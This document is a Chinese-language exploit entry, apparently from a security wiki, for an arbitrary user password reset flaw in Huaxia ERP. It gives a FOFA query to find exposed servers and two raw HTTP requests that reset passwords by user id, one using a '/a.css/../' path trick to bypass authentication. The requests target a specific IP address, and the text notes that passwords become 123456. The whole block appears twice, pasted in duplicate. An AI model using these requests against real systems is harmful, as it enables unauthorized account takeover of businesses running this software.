華夏ERP越權任意用戶密碼重置漏洞

# 華夏ERP越權任意用戶密碼重置漏洞
==FOFA==

title="华夏ERP"

==EXP==

POST /user/resetPwd HTTP/1.1
Host: 47.116.69.14
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45
X-Requested-With: XMLHttpRequest
Referer: http://47.116.69.14/pages/reports/account_report.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5
Cookie: JSESSIONID=D735ED1C9E200438866A79896DF1F77D;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
id=63

POST /a.css/../user/resetPwd HTTP/1.1
Host: 47.116.69.14
Content-Length: 8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Edg/85.0.564.60
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://47.116.69.14
Referer: http://47.116.69.14/pages/manage/user.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5
Connection: close
id=90824

密碼重置爲123456，用戶名需要枚舉。==FOFA==

title="华夏ERP"

==EXP==

POST /user/resetPwd HTTP/1.1
Host: 47.116.69.14
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45
X-Requested-With: XMLHttpRequest
Referer: http://47.116.69.14/pages/reports/account_report.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5
Cookie: JSESSIONID=D735ED1C9E200438866A79896DF1F77D;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
id=63

POST /a.css/../user/resetPwd HTTP/1.1
Host: 47.116.69.14
Content-Length: 8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Edg/85.0.564.60
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://47.116.69.14
Referer: http://47.116.69.14/pages/manage/user.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5
Connection: close
id=90824

密碼重置爲123456，用戶名需要枚舉。

==參考==
http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%8D%8E%E5%A4%8FERP/%E5%8D%8E%E5%A4%8FERP%E8%B6%8A%E6%9D%83%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E9%87%8D%E7%BD%AE%E6%BC%8F%E6%B4%9E.md